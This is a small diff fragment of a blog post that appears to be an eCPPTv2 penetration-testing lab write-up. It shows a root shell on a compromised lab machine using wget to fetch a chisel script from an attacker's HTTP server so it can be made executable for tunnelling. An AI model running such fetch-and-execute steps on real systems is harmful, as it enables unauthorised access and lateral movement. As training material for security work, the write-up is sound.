Zeekk3n/Andrey.github.io/_posts/2023-04-04-ecpptv2-writeup.md

 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
 ```

-from the machine that we obtained root before we have to wget it and give it permissions of execution
+from the machine that we obtained root before we have to wget it and give it permissions of execution.
 ```bash
 bash-5.0# wget 192.168.100.53:80/chisel.sh
 --2023-04-21 22:04:56--  http://192.168.100.53/chisel.sh